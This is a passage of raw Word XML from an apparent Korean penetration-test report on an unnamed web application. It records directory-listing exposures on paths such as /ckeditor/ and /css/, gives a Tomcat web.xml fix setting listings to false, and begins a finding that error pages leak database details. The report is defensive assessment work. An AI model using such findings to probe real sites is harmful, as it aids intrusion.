TAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGbg/rawAgAAkwUAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHoAutLfAAAACQEA&#10;AA8AAAAAAAAAAAAAAAAACgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAWBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F60AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F367B01" wp14:editId="0A5CE719">
            <wp:extent cx="4571187" cy="2190750"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="1905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4794"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2191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2B013" w14:textId="1840B803" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc206630369"/>
      <w:bookmarkStart w:id="318" w:name="_Toc206630507"/>
      <w:bookmarkStart w:id="319" w:name="_Toc20909458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15</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004A2C08" w:rsidRPr="004A2C08">
        <w:t>/ckeditor/ 디렉터리 인덱싱 취약점 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="45C9BA0B" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRPr="002208A3" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F31C79" w14:textId="03846DC0" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc206630370"/>
      <w:bookmarkStart w:id="321" w:name="_Toc206630508"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251508736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D40EF1F" wp14:editId="291A5325">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2419350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280036</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="792480" cy="220980"/>
                <wp:effectExtent l="0" t="0" r="26670" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="62" name="직사각형 62"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="79248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1653" id="직사각형 62" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:190.5pt;margin-top:22.05pt;width:62.4pt;height:17.4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hNsAIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mC87EQOTASuCgQ&#10;JEGTImuaomwBFIclacvuLr1Dgd6gmy56riK9Q4ekpBhp0EVRL+QhZ+YN583n9GzbSLIRxtagCjo6&#10;SCkRikNZq2VBP9zN35xQYh1TJZOgREF3wtKz6etXp63ORQYrkKUwBEGUzVtd0JVzOk8Sy1eiYfYA&#10;tFCorMA0zOHRLJPSsBbRG5lkaXqUtGBKbYALa/H2IirpNOBXleDuuqqscEQWFN/mwteE78J/k+kp&#10;y5eG6VXNu2ewf3hFw2qFQQeoC+YYWZv6D6im5gYsVO6AQ5NAVdVchBwwm1H6LJvbFdMi5ILkWD3Q&#10;ZP8fLL/a3BhSlwU9yihRrMEaPX57ePz8/eePh19fvxC8Ro5abXM0vdU3pjtZFH3C28o0/h9TIdvA&#10;627gVWwd4Xh5PMnGJ8g+R1WWpROUESV5ctbGurcCGuKFghosW2CTbS6ti6a9iY+lYF5Lifcsl4q0&#10;2HeT9DANHhZkXXqtV1qzXJxLQzYMqz+fp/jrAu+Z4TOkwtf4FGNSQXI7KWKA96JCgjCNLEbwrSkG&#10;WMa5UG4UVStWihjtcD9Y7xFylgoBPXKFrxywO4DeMoL02JGBzt67itDZg3OX+t+cB48QGZQbnJta&#10;gXkpM4lZdZGjfU9SpMaztIByh+1jIM6V1XxeYwUvmXU3zOAgYdFxObhr/FQSsFLQSZSswHx66d7b&#10;Y3+jlpIWB7Og9uOaGUGJfKew8yej8dhPcjiMD48zPJh9zWJfo9bNOWD1R7iGNA+it3eyFysDzT3u&#10;kJmPiiqmOMYuKHemP5y7uDBwC3ExmwUznF7N3KW61dyDe1Z9h95t75nRXRs77P8r6IeY5c+6Odp6&#10;TwWztYOqDq3+xGvHN05+aJxuS/nVsn8OVk+7dPobAAD//wMAUEsDBBQABgAIAAAAIQAybBaR3wAA&#10;AAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4NAEIXvJv6HzZh4swvYCiJLoybG2HjQtt637BRI&#10;2VnCbgH/veNJj5N5ee/7ivVsOzHi4FtHCuJFBAKpcqalWsF+93KTgfBBk9GdI1TwjR7W5eVFoXPj&#10;JvrEcRtqwSXkc62gCaHPpfRVg1b7heuR+Hd0g9WBz6GWZtATl9tOJlF0J61uiRca3eNzg9Vpe7YK&#10;PtzpKLuvJNmkT69J+mazqR7flbq+mh8fQAScw18YfvEZHUpmOrgzGS86BbdZzC5BwXIZg+DAKlqx&#10;y0FBmt2DLAv536D8AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEHPuE2wAgAAkwUAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADJsFpHfAAAACQEA&#10;AA8AAAAAAAAAAAAAAAAACgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAWBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002C5CAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A73032B" wp14:editId="71F47A98">
            <wp:extent cx="4571187" cy="2350770"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="1143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570"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2351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20"/>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w14:paraId="17983E0D" w14:textId="7F73EB6A" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc206630371"/>
      <w:bookmarkStart w:id="323" w:name="_Toc206630509"/>
      <w:bookmarkStart w:id="324" w:name="_Toc209094589"/>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16</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E467AF" w:rsidRPr="00E467AF">
        <w:t>/css/ 디렉터리 인덱싱 취약점 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
      <w:bookmarkEnd w:id="323"/>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w14:paraId="740285AC" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCF1C7C" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRPr="00CB22A6" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">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CC250B" w:rsidRPr="00B112DB" w14:paraId="64709D34" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67848468"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1D86EEF"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4724A8E8"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F18A1" w:rsidRPr="00B112DB" w14:paraId="19BE4A19"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F4BB453" w14:textId="79914F4E" w:rsidR="009F18A1" w:rsidRPr="00CB22A6" w:rsidRDefault="009F18A1" w:rsidP="009F18A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51A53A" w14:textId="4667708A" w:rsidR="009F18A1" w:rsidRPr="00CB22A6"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53C6A14" w14:textId="4E3FDE12" w:rsidR="009F18A1" w:rsidRPr="00CB22A6"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/c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keditor/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F18A1" w:rsidRPr="00B112DB" w14:paraId="1C49EC38"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D4C8207" w14:textId="5AF7DE29" w:rsidR="009F18A1" w:rsidRPr="00CB22A6" w:rsidRDefault="009F18A1" w:rsidP="009F18A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52C72" w14:textId="72129F1C"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C26EC74" w14:textId="03372951" w:rsidR="009F18A1" w:rsidRPr="00987A57"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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>css/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F18A1" w:rsidRPr="00B112DB" w14:paraId="553E1AB7"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ABCFD04" w14:textId="4A93AF8D" w:rsidR="009F18A1" w:rsidRPr="00CB22A6"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433E2C" w14:textId="1EC2A298"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1B4EEE8" w14:textId="7638B48E" w:rsidR="009F18A1" w:rsidRPr="00987A57"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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F18A1" w:rsidRPr="00B112DB" w14:paraId="62833FD4"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42695EC" w14:textId="60349290"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5265E9" w14:textId="5BE78364"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F1C7A0D" w14:textId="7873AB43" w:rsidR="009F18A1" w:rsidRPr="00BF251E" w:rsidRDefault="009F18A1" w:rsidP="009F18A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/fonts/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F18A1" w:rsidRPr="00B112DB" w14:paraId="4CFEC27F"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C500913" w14:textId="647860EB"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90B39" w14:textId="792B0EF4"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FB06426" w14:textId="087E2E0B" w:rsidR="009F18A1" w:rsidRPr="00BF251E" w:rsidRDefault="009F18A1" w:rsidP="009F18A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB728C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/js/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F18A1" w:rsidRPr="00B112DB" w14:paraId="067D2548"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5D6FE0F" w14:textId="0A0BF1C8"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DD4B36" w14:textId="07474918"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B9B0E36" w14:textId="6BB9037B" w:rsidR="009F18A1" w:rsidRPr="00FB728C" w:rsidRDefault="009F18A1" w:rsidP="009F18A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB728C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/img/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="342D69D7" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D421EE4" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRPr="00CB22A6" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAFED14" w14:textId="6C63FDE7" w:rsidR="00FD6D72" w:rsidRDefault="00393FFA" w:rsidP="002B7B98">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">omcat </w:t>
      </w:r>
      <w:r w:rsidR="002F3C15" w:rsidRPr="002F3C15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidR="002F3C15" w:rsidRPr="002F3C15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 설정에서 아래와 같이 false</w:t>
      </w:r>
      <w:r w:rsidR="0041609E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F3C15" w:rsidRPr="002F3C15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>값을 통해 디렉터리 리스팅을 비활성화해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393FFA" w14:paraId="0F9AD370" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="71673EA4" w14:textId="0C729B49" w:rsidR="00393FFA" w:rsidRPr="00942321" w:rsidRDefault="00942321" w:rsidP="004D3796">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat </w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>설정 파일 위치:</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> /[</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">omcat </w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>설치 위치</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>]/</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00393FFA" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>onf/web.xm</w:t>
            </w:r>
            <w:r w:rsidR="00321BE4" w:rsidRPr="00942321">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB12497" w14:textId="085CF673" w:rsidR="00393FFA" w:rsidRDefault="00393FFA" w:rsidP="004D3796">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D5882C" w14:textId="77777777" w:rsidR="00393FFA" w:rsidRDefault="00393FFA" w:rsidP="004D3796">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;param-name&gt;listings&lt;/param-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D5FF96" w14:textId="77777777" w:rsidR="00393FFA" w:rsidRDefault="00393FFA" w:rsidP="004D3796">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    &lt;param-value&gt;false&lt;/param-value&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BB0425" w14:textId="77777777" w:rsidR="00393FFA" w:rsidRDefault="00393FFA" w:rsidP="00393FFA">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:keepNext/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/init-param&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="564E1C01" w14:textId="70A327C7" w:rsidR="00447E2D" w:rsidRPr="009638C5" w:rsidRDefault="00447E2D" w:rsidP="00447E2D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc209094672"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[코드</w:t>
      </w:r>
      <w:r>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2</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">디렉터리 </w:t>
      </w:r>
      <w:r w:rsidR="007C0932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>리스팅 설정 코드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="4B45A00B" w14:textId="1A26FAED" w:rsidR="00174A60" w:rsidRPr="00447E2D" w:rsidRDefault="00174A60" w:rsidP="00393FFA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DB6E65" w14:textId="6113410E" w:rsidR="00174A60" w:rsidRDefault="00174A60">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734A56C" w14:textId="306B5564" w:rsidR="00174A60" w:rsidRDefault="00AD2472" w:rsidP="00174A60">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc209094557"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>정보 누출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="29BAD7E8" w14:textId="77777777" w:rsidR="00174A60" w:rsidRDefault="00174A60" w:rsidP="00174A60">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A034EA7" w14:textId="4E9C3353" w:rsidR="00174A60" w:rsidRDefault="009159C5" w:rsidP="00174A60">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹에서 외부에 공개되어서는 안 되는 민감 정보가 의도치 않게 노출되는 보안 약점을 의미합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>혹은 에러 발생 시 애플리케이션 정보,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">데이터베이스 정보 등 노출되는 경우 공격자들에게 </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>차 공격을 위한 정보로 활용될 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969D928" w14:textId="77777777" w:rsidR="009159C5" w:rsidRDefault="009159C5" w:rsidP="00174A60">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BED1995" w14:textId="77777777" w:rsidR="00174A60" w:rsidRPr="00CB22A6" w:rsidRDefault="00174A60" w:rsidP="00174A60">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E7400" w14:textId="352571EE" w:rsidR="00EB662B" w:rsidRPr="00C96271" w:rsidRDefault="004F6D17" w:rsidP="00C96271">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력 파라미터에 비정상적인 값을 전달할 경우 에러 페이지가 나타났습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에러 페이지에는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 정보가 담겨 있어 공격자의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>차 공격에 활용될 가능성이 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="0033574C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
